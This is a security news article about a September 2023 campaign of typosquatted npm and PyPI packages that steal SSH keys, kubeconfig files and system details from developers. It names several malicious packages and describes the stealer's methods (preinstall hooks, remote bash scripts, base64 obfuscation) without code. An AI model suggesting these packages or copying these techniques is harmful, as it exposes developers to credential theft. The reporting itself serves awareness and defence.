https://www.bleepingcomputer.com/news/security/ssh-keys-stolen-by-stream-of-malicious-pypi-and-npm-packages/ BleepingComputer.com logo * * * * [ ] [Login] [Sign up] * * * * [ ] [Login] [Sign up] * News + Featured + Latest + Microsoft: Outlook email sending issues for users with lots of folders Microsoft: Outlook email sending issues for users with lots of folders + Amazon sues REKK fraud gang that stole millions in illicit refunds Amazon sues REKK fraud gang that stole millions in illicit refunds + Google shares "fix" for deleted Google Drive files Google shares "fix" for deleted Google Drive files + New 5Ghoul attack impacts 5G phones with Qualcomm, MediaTek chips New 5Ghoul attack impacts 5G phones with Qualcomm, MediaTek chips + Over 30% of Log4J apps use a vulnerable version of the library Over 30% of Log4J apps use a vulnerable version of the library + Save $220 on security training with this CyberTraining 365 deal Save $220 on security training with this CyberTraining 365 deal + AutoSpill attack steals credentials from Android password managers AutoSpill attack steals credentials from Android password managers + Save $210 on focused cybersecurity training with InfoSec4TC Save $210 on focused cybersecurity training with InfoSec4TC * Downloads + Latest + Most Downloaded + Qualys BrowserCheck Qualys BrowserCheck + STOPDecrypter STOPDecrypter + AuroraDecrypter AuroraDecrypter + FilesLockerDecrypter FilesLockerDecrypter + AdwCleaner AdwCleaner + ComboFix ComboFix + RKill RKill + Junkware Removal Tool Junkware Removal Tool * VPNs + Popular + Best VPNs Best VPNs + How to change IP address How to change IP address + Access the dark web safely Access the dark web safely + Best VPN for YouTube Best VPN for YouTube * Virus Removal Guides + Latest + Most Viewed + Ransomware + Remove the Theonlinesearch.com Search Redirect Remove the Theonlinesearch.com Search Redirect + Remove the Smartwebfinder.com Search Redirect Remove the Smartwebfinder.com Search Redirect + How to remove the PBlock+ adware browser extension How to remove the PBlock+ adware browser extension + Remove the Toksearches.xyz Search Redirect Remove the Toksearches.xyz Search Redirect + Remove Security Tool and SecurityTool (Uninstall Guide) Remove Security Tool and SecurityTool (Uninstall Guide) + How to Remove WinFixer / Virtumonde / Msevents / Trojan.vundo How to Remove WinFixer / Virtumonde / Msevents / Trojan.vundo + How to remove Antivirus 2009 (Uninstall Instructions) How to remove Antivirus 2009 (Uninstall Instructions) + How to remove Google Redirects or the TDSS, TDL3, or Alureon rootkit using TDSSKiller How to remove Google Redirects or the TDSS, TDL3, or Alureon rootkit using TDSSKiller + Locky Ransomware Information, Help Guide, and FAQ Locky Ransomware Information, Help Guide, and FAQ + CryptoLocker Ransomware Information Guide and FAQ CryptoLocker Ransomware Information Guide and FAQ + CryptorBit and HowDecrypt Information Guide and FAQ CryptorBit and HowDecrypt Information Guide and FAQ + CryptoDefense and How_Decrypt Ransomware Information Guide and FAQ CryptoDefense and How_Decrypt Ransomware Information Guide and FAQ * Tutorials + Latest + Popular + How to enable Kernel-mode Hardware-enforced Stack Protection in Windows 11 How to enable Kernel-mode Hardware-enforced Stack Protection in Windows 11 + How to use the Windows Registry Editor How to use the Windows Registry Editor + How to backup and restore the Windows Registry How to backup and restore the Windows Registry + How to open a Windows 11 Command Prompt as Administrator How to open a Windows 11 Command Prompt as Administrator + How to start Windows in Safe Mode How to start Windows in Safe Mode + How to remove a Trojan, Virus, Worm, or other Malware How to remove a Trojan, Virus, Worm, or other Malware + How to show hidden files in Windows 7 How to show hidden files in Windows 7 + How to see hidden files in Windows How to see hidden files in Windows * Deals + Categories + eLearning eLearning + IT Certification Courses IT Certification Courses + Gear & Gadgets Gear + Gadgets + Security Security * Forums * More + Startup Database + Uninstall Database + Glossary + Chat on Discord + Send us a Tip! + Welcome Guide * Home * News * Security * SSH keys stolen by stream of malicious PyPI and npm packages * * SSH keys stolen by stream of malicious PyPI and npm packages By Bill Toulas * September 27, 2023 * 05:48 PM * 1 Packages A stream of malicious npm and PyPi packages have been found stealing a wide range of sensitive data from software developers on the platforms. The campaign started on September 12, 2023, and was first discovered by Sonatype, whose analysts unearthed 14 malicious packages on npm. Phylum reports that after a brief operational hiatus on September 16 and 17, the attack has resumed and expanded to the PyPI ecosystem. Since the start of the campaign, the attackers have uploaded 45 packages on npm (40) and PyPI (5), with variants in the code indicating a rapid evolution in the attack. Malicious packages The complete list of the malicious packages distributed in this campaign can be found in the bottom section of Phylum's report. However, it is worth noting that the following packages utilized typosquatting to resemble legitimate popular packages, which can trick developers into installing them: * shineouts and @dynamic-form-components/shineout - mimicking the popular React library "Shineout" * apm-web-vitals - could pass as "APM" (application performance monitoring) for Google's "web-vitals" library that measures web performance * eslint-plugin-shein-soc-raw and @spgy/eslint-plugin-spgy-fe - pretending to be ESLint plugins * ssc-concurrent-log-handler & sc-concurrent-log-handler - pretending to be legitimate logging utilities According to Phylum, at least seven distinct attack waves and several phases featured code modifications to enhance stealth and add more specific targeting. The first attack waves occurred between September 12 and 15, with the threat actors uploading new package sets daily, reaching a total of 33 packages. The later attack waves occurred on September 18 (three packages), September 20 (five packages), and September 24 (4 packages). In the initial waves, the packages had hardcoded data collection and exfiltration routines, containing the data collection code in plain text form internally, which made them susceptible to detection. The middle iterations introduced more complex mechanisms like retrieving and executing the data-collecting bash script from an external domain. Retrieving the bash script from an external sourceRetrieving the bash script from an external source (Phylum) Also, the authors added a "preinstall" hook to run malicious JavaScript automatically upon installation. The most recent packages utilized base64 encoding to evade analysis, which was later upgraded to double base64 encoding. In general, the attackers engaged in a continuous code testing and refinement process and even delivered packages that specialized in some aspects of data collection more than others. Info-stealing threat The data stolen by the packages includes sensitive machine and user information. Collected machine and user details include hostname, username, current path, OS version, external and internal IP addresses, and Python version for PyPI packages. These details and the Kubernetes configurations stored on kubeconfig files and SSH private keys in ~/.ssh/id_rsa are written in a text file (ConceptualTest.txt) and sent to the attackers' servers. Content of the bash scriptContent of the bash script (Phylum) The stolen information can be used to expose the real identities of developers and give the attackers unauthorized access to systems, servers, or infrastructure accessible through the stolen SSH private keys. If stolen Kubernetes configurations contain credentials to access clusters, the attackers could modify deployments, add malicious containers, access sensitive data stored in the cluster, move laterally, or launch a ransomware attack. Users of code distribution platforms such as PyPI and npm are advised to be cautious with what packages they download and launch on their systems, as there's a constant influx of malware in those ecosystems. Related Articles: Malicious Solana, Kucoin packages infect NuGet devs with SeroXen RAT This Black Friday, learn Python with $95 off this training bundle Atomic Stealer malware strikes macOS via fake browser updates Malware dev says they can revive expired Google auth cookies Lumma Stealer malware now uses trigonometry to evade detection * Coding * Information Stealer * Information-stealing malware * npm * Package Manager * Packages * PyPI * Repository * * * * * Bill Toulas Bill Toulas is a tech writer and infosec news reporter with over a decade of experience working on various online publications, covering open-source, Linux, malware, data breach incidents, and hacks. * Previous Article * Next Article Comments * Thor-x86 Photo Thor-x86 - 2 months ago + + TPM (trusted platform module) is the only way to store private keys securely, of course with passphrase. Most modern laptop have one Post a Comment Community Rules You need to login in order to post a comment [Login] Not a member yet? Register Now You may also like: [INS::INS] Popular Stories * Android leak AutoSpill attack steals credentials from Android password managers * 5Ghoul New 5Ghoul attack impacts 5G phones with Qualcomm, MediaTek chips Follow us: * * * * * Main Sections * News * VPN Buyer Guides * Downloads * Virus Removal Guides * Tutorials * Startup Database * Uninstall Database * Glossary Community * Forums * Forum Rules * Chat Useful Resources * Welcome Guide * Sitemap Company * About BleepingComputer * Contact Us * Send us a Tip! * Advertising * Write for BleepingComputer * Social & Feeds * Changelog Terms of Use - Privacy Policy - Ethics Statement - Affiliate Disclosure Copyright @ 2003 - 2023 Bleeping Computer^(r) LLC - All Rights Reserved Login Username [ ] Password [ ] [*] Remember Me [ ] Sign in anonymously [Login] Sign in with Twitter button Sign in with Twitter --------------------------------------------------------------------- Not a member yet? Register Now Reporter Help us understand the problem. What is going on with this comment? * ( )Spam * ( )Abusive or Harmful * ( )Inappropriate content * ( )Strong language * ( )Other [ ] * [ ] Read our posting guidelinese to learn what content is prohibited. Submitting... SUBMIT